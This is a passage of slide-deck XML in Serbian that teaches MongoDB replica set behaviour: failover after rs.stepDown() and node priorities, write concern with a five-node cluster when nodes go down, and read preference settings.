            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> metoda na čvoru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> na 60s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Novi proces selekcije primarnog čvora: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8" name="Google Shape;63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801" y="1986475"/>
            <a:ext cx="3192374" cy="30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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="597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Demonstracija Failover procesa - primer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106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222750" y="663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Nakon definisanog vremena od 60 sekundi od pokretanja rs.stepDown() metode, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ponovo dobija pravo da bude kandidat u procesu selekcije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 obzirom da je njegov definisan prioritet prilikom konfiguracije veći od ostalih čvorova u Replica Set-u, inicira se novi proces selekcije iako je </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> čvor izabran kao novi primarni</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="645" name="Google Shape;64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725" y="2373625"/>
            <a:ext cx="2914549" cy="27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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107850" y="147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Demonstracija Failover procesa - primer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02685"/>
            <a:ext cx="8520600" cy="1260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08082"/>
            <a:ext cx="9144000" cy="1760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Operacije čitanja i upisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - primer 1 - Write Concern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Replica Set koji sadrži pet čvorova (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo5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Dodeljeni prioriteti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>svima osim</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>čvoru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, kome je prioritet </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>2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Podrazumevana vrednost: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>w: 'majority'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Zatim je izmenjena vrednost tako da zahteva potvrdu od tri čvora, tj. primarnog i dva sekundarna čvora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Kao provera, unosi se dokument:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>db.logs.insertOne({ test: "WriteConcern w:3 - all nodes up" })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Operacije čitanja i upisa - primer 1 - Write Concern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Zatim se koristi komanda kojom se čvorovi </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> zaustavljaju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 obzirom da većina čvorova Replica Set-a nije dostupna, sledeća operacija upisa na čvoru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> nije moguća:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="666" name="Google Shape;66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562" y="2697201"/>
            <a:ext cx="5160875" cy="23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Operacije čitanja i upisa - primer 1 - Write Concern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Kao posledica pada većine čvorova, mongo1 ne može održati svoj status primarnog =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> postaju sekundarni čvorovi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 postoji primarni čvor koji će preuzeti operacije upisa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Nakon povratka čvora </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> se proces selekcije ponovo inicira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 kraju je moguće izvršiti operaciju upisa jer su tri čvora prisutna u Replica Set-u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Operacije čitanja i upisa - primer 2 - Read Preference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111"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="572700"/>
            <a:ext cx="8520600" cy="3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Replica Set koji sadrži pet čvorova (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo5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Dodeljeni prioriteti </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>svima osim</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>čvoru </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, kome je prioritet </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>2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 Preference se primenjuje nad individualnom konekcijom, za razliku od Read i Write Concern svojstava koji se podešavaju na nivou čitavog klastera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Podrazumevana vrednost: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>primary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Vrši se povezivanje na </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>mongo1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>čvor: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600" y="2679925"/>
            <a:ext cx="4736800" cy="23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